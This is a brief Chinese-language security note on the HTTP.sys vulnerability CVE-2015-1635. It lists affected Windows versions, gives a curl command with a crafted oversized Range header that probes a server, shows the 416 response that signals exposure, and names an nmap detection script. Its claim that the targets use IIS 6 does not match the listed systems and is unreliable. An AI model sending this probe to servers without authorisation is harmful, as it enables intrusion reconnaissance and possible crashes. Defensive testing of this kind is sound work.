利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃
范围:
- Windows 7
- Windows Server 2008 R2
- Windows 8
- Windows Server 2012
- Windows 8.1
- Windows Server 2012 R2
思路:
若目标网站系统为以上系统,并且使用IIS 6中间件,则可能存在此漏洞
测试:
//向服务器发包
Range: bytes=0-18446744073709551615
curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
//响应
HTTP/1.1 416 Requested Range Not Satisfiable
Content-Type: text/html
Last-Modified: Thu, 22 Aug 2013 23:53:12 GMT
Accept-Ranges: bytes
ETag: "2edebc2929fce1:0"
工具:
- nmap -Pn --script http-vuln-cve2015-1635
MS08067安全实验室
Frieza